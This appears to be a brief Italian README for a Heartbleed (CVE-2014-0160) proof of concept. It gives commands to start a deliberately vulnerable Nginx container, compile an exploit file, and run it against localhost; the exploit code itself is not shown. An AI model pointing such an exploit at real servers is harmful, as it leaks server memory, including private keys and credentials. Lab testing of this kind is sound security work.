
CVE-2014-0160 OpenSSL Heartbleed Prova di concetto
CVE-2014-0160 OpenSSL Heartbleed Prova di concetto
Scarica ed esegui il contenitore Docker (Server Nginx vulnerabile)
docker run -p 4443:443 -it --rm --name hb gescobero/heartbleed:1.0
Compila l'attacco Heartbleed
gcc heartbleed.c -o heartbleed
Eseguilo con il server Nginx come target
./heartbleed 127.0.0.1 4443